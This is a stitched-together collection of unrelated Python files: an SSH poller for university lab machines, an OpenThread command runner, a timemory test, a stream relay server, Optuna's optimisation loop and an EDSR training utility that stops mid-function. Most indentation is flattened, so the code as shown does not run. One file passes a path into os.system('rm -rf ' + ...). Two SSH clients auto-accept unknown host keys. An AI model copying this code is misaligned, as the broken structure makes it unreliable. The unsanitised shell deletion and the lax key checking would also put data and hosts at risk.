'1_accept': Thread(target=accept, args=(client_pub_addr[1],)),
'2_connect': Thread(target=connect, args=(priv_addr, client_pub_addr,)),
'3_connect': Thread(target=connect, args=(priv_addr, client_priv_addr,)),
}
for name in sorted(threads.keys()):
logger.info('start thread %s', name)
threads[name].start()
while threads:
keys = list(threads.keys())
for name in keys:
try:
threads[name].join(1)
except TimeoutError:
continue
if not threads[name].is_alive():
threads.pop(name)
if __name__ == '__main__':
    logging.basicConfig(level=logging.INFO, format='%(asctime)s %(message)s')
main(*addr_from_args(sys.argv))
|
labScan.py
|
import paramiko
from multiprocessing import Process, Queue
import datetime
import config
import pickle
import os.path
import math
import re
import discord
import botClient as bc
import asyncio
import time
import threading
import sys
class LabScan():
def __init__(self, configfile):
self.labs = {}
self.mins = []
self.configfile = configfile
self.bot = None
self.newLabs = False
self.lock = threading.Lock()
self.quit = False
try:
labt = pickle.load( open( "./persistence/labs.p", "rb" ) )
self.lock.acquire()
self.labs = labt[0]
self.mins = labt[1]
self.lock.release()
print("Labs successfully loaded.")
except:
print("No labs to load")
def pollLabs(self):
sp = 2
creds = config.getCreds(self.configfile)
logfile = "./persistence/"+config.getLogfile(self.configfile)
keyfile = "./persistence/"+config.getKeyfile(self.configfile)
while True:
print("Starting scan at {}".format(str(datetime.datetime.now())), flush=True)
mini = 100
mins = []
for room in [218,219,220,221,232]:
print("lab" + str(room) + ":\n ", end='', flush=True)
for row in range(1,7):
print( " 0" + str(row), end='', flush=True)
print("")
for column in "abcd":
print("-" + str(column), end='', flush=True)
line = ""
for row in range(1,7):
try:
users = -1
host = "lab{}-{}0{}.cs.curtin.edu.au.".format(room,column,row)
q = Queue()
proc = Process(target=checkLab, args=(host,q,creds,keyfile))
proc.start()
try:
users = q.get(timeout=2)
proc.join()
except Exception as err:
try:
proc.terminate()
except:
pass
self.lock.acquire()
self.labs[host] = users
self.lock.release()
if (users>-1 and users < mini):
mini = users
mins = []
if (users == mini):
mins.append(host)
line += " " + str((" ",users)[users!=-1]) + pad(users,sp)
except:
pass
print(line,flush=True)
self.lock.acquire()
self.mins = mins
print("Finishing scan at {}".format(str(datetime.datetime.now())), flush=True)
max = -1
for lab in sorted(self.labs,key=self.labs.get):
if self.labs[lab] > max:
max = self.labs[lab]
if max == -1:
#print("All labs down, loading from backup", flush=True)
#labt = pickle.load( open( "./persistence/labs.p", "rb" ) )
#self.labs = labt[0]
#self.mins = labt[1]
print("All labs appear down, restarting", flush=True)
sys.exit()
else:
print("Saving up machines to file", flush=True)
pickle.dump( (self.labs,self.mins), open ("./persistence/labs.p", "wb" ) )
logStr = ""
if os.path.isfile(logfile):
print("Log file exists, appending", flush=True)
logStr += "{},".format(str(datetime.datetime.now()))+","
for lab in sorted(self.labs.keys()):
logStr += str(self.labs[lab]) + ","
logStr = logStr[:-1]
elif not os.path.isdir(logfile):
print("Log file specified but none existant, creating", flush=True)
dataStr = "{},".format(str(datetime.datetime.now()))
logStr += "Time,"
for lab in sorted(self.labs.keys()):
logStr += lab.split(".")[0][3:] + ","
dataStr += str(self.labs[lab]) + ","
logStr = logStr[:-1] + "\n" + dataStr[:-1]
if not logStr == "":
try:
with open(logfile,"a") as f:
f.write(logStr+"\n")
print("Log file successfully written to.", flush=True)
except:
print("Log file unable to be written to", flush=True)
else:
print("Log file not specified", flush=True)
self.lock.release()
if self.bot:
if self.bot.eloop:
self.bot.eloop.create_task(self.bot.updatePMsg())
#self.newLabs = True
#asyncio.create_task(self.bot.updatePMsg())
time.sleep(300)
def checkLab( host, temp, creds, keyfile ):
sshclient = paramiko.SSHClient()
sshclient.set_missing_host_key_policy(paramiko.AutoAddPolicy)
try:
sshclient.connect(host, username=creds[0], password=creds[1], timeout=1, banner_timeout=1, auth_timeout=1, key_filename=keyfile)
stdin, stdout, stderr = sshclient.exec_command('who | wc -l',timeout=1)
for line in stderr:
#print(line.strip('\n'))
pass
for line in stdout:
#print(line.strip('\n'))
temp.put(int(line.strip('\n'))-1)
sshclient.close()
except:
pass
def pad(inte,places):
if inte < 1:
padding = places-1
else:
padding = (places-int(1+math.log10(abs(inte))))
return " " * padding
|
command_handlers.py
|
#!/usr/bin/env python3
#
# Copyright (c) 2020, The OpenThread Authors.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
import logging
import queue
import re
import threading
import time
from abc import abstractmethod
from typing import Any, Callable, Optional, Union, List, Pattern
from .connectors import OtCliHandler
from .errors import ExpectLineTimeoutError, CommandError
from .utils import match_line
class OTCommandHandler:
"""This abstract class defines interfaces of a OT Command Handler."""
@abstractmethod
def execute_command(self, cmd: str, timeout: float) -> List[str]:
"""Method execute_command should execute the OT CLI command within a timeout (in seconds) and return the
command output as a list of lines.
Note: each line SHOULD NOT contain '\r\n' at the end. The last line of output should be 'Done' or
'Error <code>: <msg>' following OT CLI conventions.
"""
pass
@abstractmethod
def close(self):
"""Method close should close the OT Command Handler."""
pass
@abstractmethod
def wait(self, duration: float) -> List[str]:
"""Method wait should wait for a given duration and return the OT CLI output during this period.
Normally, OT CLI does not output when it's not executing any command. But OT CLI can also output
asynchronously in some cases (e.g. `Join Success` when Joiner joins successfully).
"""
pass
@abstractmethod
def set_line_read_callback(self, callback: Optional[Callable[[str], Any]]):
"""Method set_line_read_callback should register a callback that will be called for every line
output by the OT CLI.
This is useful for handling asynchronous command output while still being able to execute
other commands.
"""
pass
def shell(self, cmd: str, timeout: float) -> List[str]:
raise NotImplementedError("shell command is not supported on %s" % self.__class__.__name__)
class OtCliCommandRunner(OTCommandHandler):
__PATTERN_COMMAND_DONE_OR_ERROR = re.compile(
r'(Done|Error|Error \d+:.*|.*: command not found)$') # "Error" for spinel-cli.py
__PATTERN_LOG_LINE = re.compile(r'((\[(NONE|CRIT|WARN|NOTE|INFO|DEBG)\])'
r'|(-.*-+: )' # e.g. -CLI-----:
r')')
"""regex used to filter logs"""
__ASYNC_COMMANDS = {'scan', 'ping', 'discover'}
def __init__(self, otcli: OtCliHandler, is_spinel_cli=False):
self.__otcli: OtCliHandler = otcli
self.__is_spinel_cli = is_spinel_cli
self.__expect_command_echoback = not self.__is_spinel_cli
self.__line_read_callback = None
self.__pending_lines = queue.Queue()
self.__should_close = threading.Event()
self.__otcli_reader = threading.Thread(target=self.__otcli_read_routine)
self.__otcli_reader.setDaemon(True)
self.__otcli_reader.start()
def __repr__(self):
return repr(self.__otcli)
def execute_command(self, cmd, timeout=10) -> List[str]:
assert not self.__should_close.is_set(), "OT CLI is already closed."
self.__otcli.writeline(cmd)
if cmd in ('reset', 'factoryreset'):
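            # The node reboots on reset/factoryreset: give it a few seconds, then send a
            # harmless command ('extaddr'), presumably to confirm the CLI is responsive again.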
self.wait(3)
self.__otcli.writeline('extaddr')
self.wait(1)
return []
if self.__expect_command_echoback:
self.__expect_line(timeout, cmd)
output = self.__expect_line(timeout,
OtCliCommandRunner.__PATTERN_COMMAND_DONE_OR_ERROR,
asynchronous=cmd.split()[0] in OtCliCommandRunner.__ASYNC_COMMANDS)
return output
def wait(self, duration: float) -> List[str]:
self.__otcli.wait(duration)
output = []
try:
while True:
line = self.__pending_lines.get_nowait()
output.append(line)
except queue.Empty:
pass
return output
def close(self):
self.__should_close.set()
self.__otcli.close()
self.__otcli_reader.join()
def set_line_read_callback(self, callback: Optional[Callable[[str], Any]]):
self.__line_read_callback = callback
#
# Private methods
#
def __expect_line(self, timeout: float, expect_line: Union[str, Pattern], asynchronous=False) -> List[str]:
output = []
if not asynchronous:
while True:
try:
line = self.__pending_lines.get(timeout=timeout)
except queue.Empty:
raise ExpectLineTimeoutError(expect_line)
output.append(line)
if match_line(line, expect_line):
break
else:
done = False
while not done and timeout > 0:
lines = self.wait(1)
timeout -= 1
for line in lines:
output.append(line)
if match_line(line, expect_line):
done = True
break
if not done:
raise ExpectLineTimeoutError(expect_line)
return output
def __otcli_read_routine(self):
while not self.__should_close.is_set():
try:
line = self.__otcli.readline()
except Exception:
if self.__should_close.is_set():
break
else:
raise
logging.debug('%s: %r', self.__otcli, line)
if line is None:
break
if line.startswith('> '):
line = line[2:]
if self.__line_read_callback is not None:
self.__line_read_callback(line)
logging.debug('%s: %s', self.__otcli, line)
if not OtCliCommandRunner.__PATTERN_LOG_LINE.match(line):
self.__pending_lines.put(line)
class OtbrSshCommandRunner(OTCommandHandler):
def __init__(self, host, port, username, password, sudo):
import paramiko
self.__host = host
self.__port = port
self.__sudo = sudo
self.__ssh = paramiko.SSHClient()
self.__ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
self.__line_read_callback = None
try:
self.__ssh.connect(host,
port=port,
username=username,
password=password,
allow_agent=False,
look_for_keys=False)
except paramiko.ssh_exception.AuthenticationException:
if not password:
self.__ssh.get_transport().auth_none(username)
else:
raise
def __repr__(self):
return f'{self.__host}:{self.__port}'
def execute_command(self, cmd: str, timeout: float) -> List[str]:
sh_cmd = f'ot-ctl {cmd}'
if self.__sudo:
sh_cmd = 'sudo ' + sh_cmd
output = self.shell(sh_cmd, timeout=timeout)
if self.__line_read_callback is not None:
for line in output:
self.__line_read_callback(line)
if cmd in ('reset', 'factoryreset'):
self.wait(3)
return output
def shell(self, cmd: str, timeout: float) -> List[str]:
cmd_in, cmd_out, cmd_err = self.__ssh.exec_command(cmd, timeout=int(timeout), bufsize=1024)
errput = [l.rstrip('\r\n') for l in cmd_err.readlines()]
output = [l.rstrip('\r\n') for l in cmd_out.readlines()]
if errput:
raise CommandError(cmd, errput)
return output
def close(self):
self.__ssh.close()
def wait(self, duration: float) -> List[str]:
time.sleep(duration)
return []
def set_line_read_callback(self, callback: Optional[Callable[[str], Any]]):
self.__line_read_callback = callback
|
test_throttle.py
|
#!@PYTHON_EXECUTABLE@
# MIT License
#
# Copyright (c) 2018, The Regents of the University of California,
# through Lawrence Berkeley National Laboratory (subject to receipt of any
# required approvals from the U.S. Dept. of Energy). All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
from __future__ import absolute_import
__author__ = "Muhammad Haseeb"
__copyright__ = "Copyright 2020, The Regents of the University of California"
__credits__ = ["Muhammad Haseeb"]
__license__ = "MIT"
__version__ = "@PROJECT_VERSION@"
__maintainer__ = "Jonathan Madsen"
__email__ = "jrmadsen@lbl.gov"
__status__ = "Development"
try:
import mpi4py # noqa: F401
from mpi4py import MPI # noqa: F401
except ImportError:
pass
import os
import time
import unittest
import threading
import inspect
import timemory as tim
from timemory import settings as settings
# --------------------------- test setup variables ----------------------------------- #
# --------------------------- helper functions ----------------------------------------- #
# check availability of a component
def check_available(component):
return inspect.isclass(component)
# compute fibonacci
def fibonacci(n):
return n if n < 2 else (fibonacci(n - 1) + fibonacci(n - 2))
# sleep for n nanosec
def do_sleep(n):
time.sleep(n * 1e-9)
# cpu utilization for n nanosec
def consume(n):
# Python 3.7 has time_ns()
try:
# get current time in nsec
now = time.time_ns()
# try until time point
while time.time_ns() < (now + n):
pass
except AttributeError:
now = 1e9 * time.time()
# try until time point
while (1e9 * time.time()) < (now + n):
pass
# get auto_tuple config
def get_config(items=["wall_clock"]):
return [getattr(tim.component, x) for x in items]
# -------------------------- Throttle Tests set ---------------------------------------- #
# Throttle tests class
class TimemoryThrottleTests(unittest.TestCase):
# setup class: timemory settings
@classmethod
def setUpClass(self):
# set up environment variables
os.environ["TIMEMORY_VERBOSE"] = "1"
os.environ["TIMEMORY_COLLAPSE_THREADS"] = "OFF"
settings.parse()
settings.verbose = 1
settings.debug = False
settings.json_output = True
settings.mpi_thread = False
settings.file_output = True
settings.dart_output = True
settings.dart_count = 1
settings.banner = False
tim.trace.init("wall_clock", False, "throttle_tests")
self.nthreads = 1
# Tear down class: finalize
@classmethod
def tearDownClass(self):
# unset environment variables
del os.environ["TIMEMORY_VERBOSE"]
del os.environ["TIMEMORY_COLLAPSE_THREADS"]
pass
# ---------------------------------------------------------------------------------- #
# test expect_true
def test_expect_true(self):
"""expect_true"""
settings.debug = False
n = 2 * settings.throttle_count
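        # Pushing the same label more than throttle_count times with negligible work per
        # push should trigger throttling, so is_throttled() is expected to return True.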
tim.trace.push("true")
for i in range(n):
tim.trace.push(self.shortDescription())
tim.trace.pop(self.shortDescription())
tim.trace.pop("true")
self.assertTrue(tim.trace.is_throttled(self.shortDescription()))
# ---------------------------------------------------------------------------------- #
# test expect_false
def test_expect_false(self):
"""expect_false"""
settings.debug = False
n = 2 * settings.throttle_count
v = 2 * settings.throttle_value
for i in range(n):
tim.trace.push(self.shortDescription())
consume(v)
tim.trace.pop(self.shortDescription())
self.assertFalse(tim.trace.is_throttled(self.shortDescription()))
# ---------------------------------------------------------------------------------- #
def test_region_serial(self):
"""region_serial"""
settings.debug = False
def _run(name):
tim.region.push("rsthread")
n = 8 * settings.throttle_count
for i in range(n):
tim.region.push(name)
tim.region.pop(name)
tim.region.pop("rsthread")
# self.assertTrue(tim.trace.is_throttled(name))
for i in range(self.nthreads):
_run(self.shortDescription())
# print(tim.trace.is_throttled(self.shortDescription()))
# print(tim.trace.is_throttled("thread"))
# ---------------------------------------------------------------------------------- #
# test region_multithreaded
def test_region_multithreaded(self):
"""region_multithreaded"""
settings.debug = False
def _run(name):
tim.region.push("rthread")
n = 8 * settings.throttle_count
for i in range(n):
tim.region.push(name)
tim.region.pop(name)
tim.region.pop("rthread")
# check assertion
self.assertTrue(tim.trace.is_throttled(name))
threads = []
for i in range(self.nthreads):
thd = threading.Thread(target=_run, args=(self.shortDescription(),))
thd.start()
threads.append(thd)
for itr in threads:
itr.join()
# ---------------------------------------------------------------------------------- #
# test multithreaded
def test_multithreaded(self):
"""multithreaded"""
settings.debug = False
# _run function
def _run(name, idx):
import sys
self.assertTrue(sys.getprofile() is None)
self.assertTrue(sys.gettrace() is None)
_name = "{}_{}".format(name, idx)
_hash = tim.add_hash_id(_name)
n = 2 * settings.throttle_count
v = 2 * settings.throttle_value
if idx % 2 == 1:
for i in range(n):
tim.trace.push(_hash)
consume(v)
tim.trace.pop(_hash)
else:
for i in range(n):
tim.trace.push(_hash)
tim.trace.pop(_hash)
is_throttled = tim.trace.is_throttled(_name)
_answer = False if (idx % 2 == 1) else True
print("thread " + str(idx) + " throttling: " + str(is_throttled))
self.assertTrue(is_throttled == _answer)
# thread handles
threads = []
# all threads
tim.trace.push(self.shortDescription())
# make new threads
for i in range(self.nthreads):
thd = threading.Thread(
target=_run, args=(self.shortDescription(), i)
)
thd.start()
threads.append(thd)
# wait for join
for itr in threads:
itr.join()
tim.trace.pop(self.shortDescription())
# ----------------------------- main test runner -------------------------------------- #
# main runner
def run():
# run all tests
unittest.main()
if __name__ == "__main__":
tim.initialize([__file__])
run()
|
web.py
|
import requests
import http.server
import socketserver
import configparser
import threading
import time
import os
from shutil import copyfile
def refresh(url, name):
while True:
r = requests.get(url)
#print(r.headers.get('content-type'))
with open('html/cache/'+name+'.jpg', 'wb') as f:
f.write(r.content)
time.sleep(0.8)
def clear():
dir = 'html/streams'
for f in os.listdir(dir):
os.remove(os.path.join(dir, f))
class Relay:
def __init__(self, name):
self.name = name
self.port = int(config.get(name, 'RelayPort'))
self.silence = config.get(name, 'Silence')
self.debugging = config.get(name, 'Debugging')
self.url = config.get(name, 'StreamSourceURL')
self.refreshRate = int(config.get(name, 'RefreshRate'))
def setIndex(self):
templatefile = "html/template.html"
indexfile = "html/streams/"+self.name+".html"
copyfile(templatefile,indexfile)
with open(templatefile, 'r') as t:
t_data = t.read()
i_data = t_data.replace("#NAME#", self.name)
with open(indexfile, 'w') as i:
i.write(i_data)
def exec(self):
x = threading.Thread(name=self.name, target=refresh, args=(self.url, self.name))
x.setDaemon(True)
x.start()
self.setIndex()
class MyHandler(http.server.SimpleHTTPRequestHandler):
def __init__(self, *args, **kwargs):
super().__init__(*args, directory="html", **kwargs)
def startServer():
with socketserver.TCPServer(("", 80), MyHandler) as httpd:
print ("Site is running.")
httpd.serve_forever()
config = configparser.ConfigParser()
config.read("relay.conf")
clear()
sections = config.sections()
for sec in sections:
r = Relay(sec)
r.exec()
startServer()
|
_optimize.py
|
from concurrent.futures import FIRST_COMPLETED
from concurrent.futures import Future
from concurrent.futures import ThreadPoolExecutor
from concurrent.futures import wait
import copy
import datetime
import gc
import itertools
import math
import os
import sys
from threading import Event
from threading import Thread
import time
from typing import Any
from typing import Callable
from typing import cast
from typing import List
from typing import Optional
from typing import Sequence
from typing import Set
from typing import Tuple
from typing import Type
from typing import Union
import warnings
import optuna
from optuna import exceptions
from optuna import logging
from optuna import progress_bar as pbar_module
from optuna import storages
from optuna import trial as trial_module
from optuna.trial import FrozenTrial
from optuna.trial import TrialState
_logger = logging.get_logger(__name__)
def _optimize(
study: "optuna.Study",
func: "optuna.study.ObjectiveFuncType",
n_trials: Optional[int] = None,
timeout: Optional[float] = None,
n_jobs: int = 1,
catch: Tuple[Type[Exception], ...] = (),
callbacks: Optional[List[Callable[["optuna.Study", FrozenTrial], None]]] = None,
gc_after_trial: bool = False,
show_progress_bar: bool = False,
) -> None:
if not isinstance(catch, tuple):
raise TypeError(
"The catch argument is of type '{}' but must be a tuple.".format(type(catch).__name__)
)
if not study._optimize_lock.acquire(False):
raise RuntimeError("Nested invocation of `Study.optimize` method isn't allowed.")
# TODO(crcrpar): Make progress bar work when n_jobs != 1.
progress_bar = pbar_module._ProgressBar(show_progress_bar and n_jobs == 1, n_trials, timeout)
study._stop_flag = False
try:
if n_jobs == 1:
_optimize_sequential(
study,
func,
n_trials,
timeout,
catch,
callbacks,
gc_after_trial,
reseed_sampler_rng=False,
time_start=None,
progress_bar=progress_bar,
)
else:
if show_progress_bar:
warnings.warn("Progress bar only supports serial execution (`n_jobs=1`).")
if n_jobs == -1:
n_jobs = os.cpu_count() or 1
time_start = datetime.datetime.now()
futures: Set[Future] = set()
with ThreadPoolExecutor(max_workers=n_jobs) as executor:
for n_submitted_trials in itertools.count():
if study._stop_flag:
break
if (
timeout is not None
and (datetime.datetime.now() - time_start).total_seconds() > timeout
):
break
if n_trials is not None and n_submitted_trials >= n_trials:
break
if len(futures) >= n_jobs:
completed, futures = wait(futures, return_when=FIRST_COMPLETED)
# Raise if exception occurred in executing the completed futures.
for f in completed:
f.result()
futures.add(
executor.submit(
_optimize_sequential,
study,
func,
1,
timeout,
catch,
callbacks,
gc_after_trial,
True,
time_start,
None,
)
)
finally:
study._optimize_lock.release()
progress_bar.close()
def _optimize_sequential(
study: "optuna.Study",
func: "optuna.study.ObjectiveFuncType",
n_trials: Optional[int],
timeout: Optional[float],
catch: Tuple[Type[Exception], ...],
callbacks: Optional[List[Callable[["optuna.Study", FrozenTrial], None]]],
gc_after_trial: bool,
reseed_sampler_rng: bool,
time_start: Optional[datetime.datetime],
progress_bar: Optional[pbar_module._ProgressBar],
) -> None:
if reseed_sampler_rng:
study.sampler.reseed_rng()
i_trial = 0
if time_start is None:
time_start = datetime.datetime.now()
while True:
if study._stop_flag:
break
if n_trials is not None:
if i_trial >= n_trials:
break
i_trial += 1
if timeout is not None:
elapsed_seconds = (datetime.datetime.now() - time_start).total_seconds()
if elapsed_seconds >= timeout:
break
try:
trial = _run_trial(study, func, catch)
except Exception:
raise
finally:
            # The following line mitigates memory problems that can occur in some
# environments (e.g., services that use computing containers such as CircleCI).
# Please refer to the following PR for further details:
# https://github.com/optuna/optuna/pull/325.
if gc_after_trial:
gc.collect()
if callbacks is not None:
frozen_trial = copy.deepcopy(study._storage.get_trial(trial._trial_id))
for callback in callbacks:
callback(study, frozen_trial)
if progress_bar is not None:
progress_bar.update((datetime.datetime.now() - time_start).total_seconds())
study._storage.remove_session()
def _run_trial(
study: "optuna.Study",
func: "optuna.study.ObjectiveFuncType",
catch: Tuple[Type[Exception], ...],
) -> trial_module.Trial:
trial = study.ask()
state: Optional[TrialState] = None
values: Optional[List[float]] = None
func_err: Optional[Exception] = None
func_err_fail_exc_info: Optional[Any] = None
# Set to a string if `func` returns correctly but the return value violates assumptions.
values_conversion_failure_message: Optional[str] = None
stop_event: Optional[Event] = None
thread: Optional[Thread] = None
if study._storage.is_heartbeat_enabled():
study._storage.fail_stale_trials()
stop_event = Event()
thread = Thread(
target=_record_heartbeat, args=(trial._trial_id, study._storage, stop_event)
)
thread.start()
try:
value_or_values = func(trial)
except exceptions.TrialPruned as e:
# TODO(mamu): Handle multi-objective cases.
state = TrialState.PRUNED
func_err = e
except Exception as e:
state = TrialState.FAIL
func_err = e
func_err_fail_exc_info = sys.exc_info()
else:
# TODO(hvy): Avoid checking the values both here and inside `Study.tell`.
values, values_conversion_failure_message = _check_and_convert_to_values(
len(study.directions), value_or_values, trial.number
)
if values_conversion_failure_message is not None:
state = TrialState.FAIL
else:
state = TrialState.COMPLETE
if study._storage.is_heartbeat_enabled():
assert stop_event is not None
assert thread is not None
stop_event.set()
thread.join()
# `Study.tell` may raise during trial post-processing.
try:
study.tell(trial, values=values, state=state)
except Exception:
raise
finally:
if state == TrialState.COMPLETE:
study._log_completed_trial(trial, cast(List[float], values))
elif state == TrialState.PRUNED:
_logger.info("Trial {} pruned. {}".format(trial.number, str(func_err)))
elif state == TrialState.FAIL:
if func_err is not None:
_logger.warning(
"Trial {} failed because of the following error: {}".format(
trial.number, repr(func_err)
),
exc_info=func_err_fail_exc_info,
)
elif values_conversion_failure_message is not None:
_logger.warning(values_conversion_failure_message)
else:
assert False, "Should not reach."
else:
assert False, "Should not reach."
if state == TrialState.FAIL and func_err is not None and not isinstance(func_err, catch):
raise func_err
return trial
def _check_and_convert_to_values(
n_objectives: int, original_value: Union[float, Sequence[float]], trial_number: int
) -> Tuple[Optional[List[float]], Optional[str]]:
if isinstance(original_value, Sequence):
if n_objectives != len(original_value):
return (
None,
(
f"Trial {trial_number} failed, because the number of the values "
f"{len(original_value)} is did not match the number of the objectives "
f"{n_objectives}."
),
)
else:
_original_values = list(original_value)
else:
_original_values = [original_value]
_checked_values = []
for v in _original_values:
checked_v, failure_message = _check_single_value(v, trial_number)
if failure_message is not None:
# TODO(Imamura): Construct error message taking into account all values and do not
# early return
# `value` is assumed to be ignored on failure so we can set it to any value.
return None, failure_message
elif isinstance(checked_v, float):
_checked_values.append(checked_v)
else:
assert False
return _checked_values, None
def _check_single_value(
original_value: float, trial_number: int
) -> Tuple[Optional[float], Optional[str]]:
value = None
failure_message = None
try:
value = float(original_value)
except (
ValueError,
TypeError,
):
failure_message = (
f"Trial {trial_number} failed, because the value {repr(original_value)} could not be "
"cast to float."
)
if value is not None and math.isnan(value):
value = None
failure_message = (
f"Trial {trial_number} failed, because the objective function returned "
f"{original_value}."
)
return value, failure_message
def _record_heartbeat(trial_id: int, storage: storages.BaseStorage, stop_event: Event) -> None:
heartbeat_interval = storage.get_heartbeat_interval()
assert heartbeat_interval is not None
while True:
storage.record_heartbeat(trial_id)
if stop_event.is_set():
return
time.sleep(heartbeat_interval)
|
utility.py
|
import os
import math
import time
import datetime
from multiprocessing import Process
from multiprocessing import Queue
from scipy import signal
from skimage.metrics import structural_similarity as ssim
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import numpy as np
import imageio
import torch
import torch.optim as optim
import torch.optim.lr_scheduler as lrs
class timer():
def __init__(self):
self.acc = 0
self.tic()
def tic(self):
self.t0 = time.time()
def toc(self, restart=False):
diff = time.time() - self.t0
if restart: self.t0 = time.time()
return diff
def hold(self):
self.acc += self.toc()
def release(self):
ret = self.acc
self.acc = 0
return ret
def reset(self):
self.acc = 0
class checkpoint():
def __init__(self, args):
self.args = args
self.ok = True
self.log = torch.Tensor()
now = datetime.datetime.now().strftime('%Y-%m-%d-%H:%M:%S')
if not args.load:
if not args.save:
args.save = now
self.dir = os.path.join('..', 'experiment', args.save)
else:
self.dir = os.path.join('..', 'experiment', args.load)
if os.path.exists(self.dir):
self.log = torch.load(self.get_path('psnr_log.pt'))
print('Continue from epoch {}...'.format(len(self.log)))
else:
args.load = ''
if args.reset:
os.system('rm -rf ' + self.dir)
args.load = ''
os.makedirs(self.dir, exist_ok=True)
os.makedirs(self.get_path('model'), exist_ok=True)
for d in args.data_test:
os.makedirs(self.get_path('results-{}'.format(d)), exist_ok=True)
        open_type = 'a' if os.path.exists(self.get_path('log.txt')) else 'w'
self.log_file = open(self.get_path('log.txt'), open_type)
with open(self.get_path('config.txt'), open_type) as f:
f.write(now + '\n\n')
for arg in vars(args):
f.write('{}: {}\n'.format(arg, getattr(args, arg)))
f.write('\n')
self.n_processes = 8
def get_path(self, *subdir):
return os.path.join(self.dir, *subdir)
def save(self, trainer, epoch, is_best=False):
trainer.model.save(self.get_path('model'), epoch, is_best=is_best)
trainer.loss.save(self.dir)
trainer.loss.plot_loss(self.dir, epoch)
self.plot_psnr(epoch)
trainer.optimizer.save(self.dir)
torch.save(self.log, self.get_path('psnr_log.pt'))
def add_log(self, log):
self.log = torch.cat([self.log, log])
def write_log(self, log, refresh=False):
print(log)
self.log_file.write(log + '\n')
if refresh:
self.log_file.close()
self.log_file = open(self.get_path('log.txt'), 'a')
def done(self):
self.log_file.close()
def plot_psnr(self, epoch):
axis = np.linspace(1, epoch, epoch)
for idx_data, d in enumerate(self.args.data_test):
label = 'SR on {}'.format(d)
fig = plt.figure()
plt.title(label)
for idx_scale, scale in enumerate(self.args.scale):
plt.plot(
axis,
self.log[:, idx_data, idx_scale].numpy(),
label='Scale {}'.format(scale)
)
plt.legend()
plt.xlabel('Epochs')
plt.ylabel('PSNR')
plt.grid(True)
plt.savefig(self.get_path('test_{}.pdf'.format(d)))
plt.close(fig)
def begin_background(self):
self.queue = Queue()
def bg_target(queue):
while True:
if not queue.empty():
filename, tensor = queue.get()
if filename is None: break
imageio.imwrite(filename, tensor.numpy())
self.process = [
Process(target=bg_target, args=(self.queue,)) \
for _ in range(self.n_processes)
]
for p in self.process: p.start()
def end_background(self):
for _ in range(self.n_processes): self.queue.put((None, None))
while not self.queue.empty(): time.sleep(1)
for p in self.process: p.join()
def save_results(self, dataset, filename, save_list, scale):
if self.args.save_results:
filename = self.get_path(
'results-{}'.format(dataset.dataset.name),
'{}_x{}_'.format(filename, scale)
)
postfix = ('SR', 'LR', 'HR')
for v, p in zip(save_list, postfix):
normalized = v[0].mul(255 / self.args.rgb_range)
tensor_cpu = normalized.byte().permute(1, 2, 0).cpu()
self.queue.put(('{}{}.png'.format(filename, p), tensor_cpu))
def quantize(img, rgb_range):
pixel_range = 255 / rgb_range
return img.mul(pixel_range).clamp(0, 255).round().div(pixel_range)
def calc_psnr(sr, hr, scale, rgb_range, dataset=None):
if hr.nelement() == 1: return 0
diff = (sr - hr) / rgb_range
if dataset and dataset.dataset.benchmark:
shave = scale
if diff.size(1) > 1:
gray_coeffs = [65.738, 129.057, 25.064]
convert = diff.new_tensor(gray_coeffs).view(1, 3, 1, 1) / 256
diff = diff.mul(convert).sum(dim=1)
else:
shave = scale + 6
valid = diff[..., shave:-shave, shave:-shave]
mse = valid.pow(2).mean()
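    # e.g. with diff normalized by rgb_range, an MSE of 1e-3 gives -10 * log10(1e-3) = 30 dB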
return -10 * math.log10(mse)
# Ref: https://github.com/HolmesShuan/EDSR-ssim
def matlab_style_gauss2D(shape=(3,3),sigma=0.5):
"""
2D gaussian mask - should give the same result as MATLAB's fspecial('gaussian',[shape],[sigma])
Acknowledgement : https://stackoverflow.com/questions/17190649/how-to-obtain-a-gaussian-filter-in-python (Author@ali_m)
"""
m,n = [(ss-1.)/2. for ss in shape]
